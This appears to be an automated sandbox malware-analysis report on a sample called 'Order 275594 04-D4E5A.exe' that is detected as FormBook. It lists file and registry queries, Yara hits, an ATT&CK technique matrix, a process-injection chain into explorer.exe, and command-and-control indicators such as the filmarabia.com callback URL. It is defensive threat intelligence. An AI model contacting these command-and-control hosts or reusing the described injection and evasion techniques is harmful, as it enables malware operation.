          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 331 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 41 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 41 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 22 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          [Behavior graph image not preserved; the details recoverable from it follow.]

          Behavior Graph ID: 433223; Sample: Order 275594 04-D4E5A.exe; Startdate: 11/06/2021; Architecture: WINDOWS; Score: 100

          Signatures on the sample: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures

          Process chain:

          • Order 275594 04-D4E5A.exe (started)
            Dropped: C:\Users\user\AppData\...DclkRlYpO.exe, PE32; C:\Users\user\AppData\Local\...\tmp285B.tmp, XML; C:\Users\...\Order 275594 04-D4E5A.exe.log, ASCII
            Signature: Injects a PE file into a foreign processes
            • Order 275594 04-D4E5A.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                DNS/IP: filmarabia.com 184.168.131.241, 49750, 80, AS-26496-GO-DADDY-COM-LLCUS, United States; www.filmarabia.com
                Signature: System process connects to network (likely due to code injection or exploit)
                • svchost.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                    • conhost.exe (started)
            • schtasks.exe (started)
              • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | Order 275594 04-D4E5A.exe | 29% | Metadefender | |
          | Order 275594 04-D4E5A.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

          Dropped Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Users\user\AppData\Roaming\EDclkRlYpO.exe | 29% | Metadefender | |
          | C:\Users\user\AppData\Roaming\EDclkRlYpO.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2 |

          Domains

          No Antivirus matches

          URLs

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://www.filmarabia.com/dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE | 0% | Avira URL Cloud | safe |
          | http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          | http://www.tiro.com | 0% | URL Reputation | safe |
          | http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          | http://www.carterandcone.coml | 0% | URL Reputation | safe |
          | http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          | http://www.typography.netD | 0% | URL Reputation | safe |
          | http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          | http://fontfabrik.com | 0% | URL Reputation | safe |
          | http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          | http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          | www.couragepennies.com/dlwk/ | 0% | Avira URL Cloud | safe |
          | http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          | http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          | http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          | http://www.sakkal.com | 0% | URL Reputation | safe |
          | https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3 | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| filmarabia.com | 184.168.131.241 | true | true | | unknown |
| www.filmarabia.com | unknown | unknown | true | | unknown |

              Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.filmarabia.com/dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE | true | Avira URL Cloud: safe | unknown |
| www.couragepennies.com/dlwk/ | true | Avira URL Cloud: safe | low |

              URLs from Memory and Binaries


                                    Contacted IPs


                                    Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 184.168.131.241 | filmarabia.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true |

                                    General Information

                                    Joe Sandbox Version:32.0.0 Black Diamond
                                    Analysis ID:433223
                                    Start date:11.06.2021
                                    Start time:13:28:16
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Order 275594 04-D4E5A.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@10/3@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 14.1% (good quality ratio 12.8%)
                                    • Quality average: 72.9%
                                    • Quality standard deviation: 31.2%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 104
                                    • Number of non-executed functions: 151
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 20.82.210.154, 23.218.208.56, 2.22.118.17, 2.22.118.19, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.209.183
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433223/sample/Order 275594 04-D4E5A.exe

                                    Simulations

                                    Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 13:29:40 | API Interceptor | 1x Sleep call for process: Order 275594 04-D4E5A.exe modified |

                                    Joe Sandbox View / Context

                                    IPs


                                    Domains

                                    No context

                                    ASN


                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 275594 04-D4E5A.exe.log
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
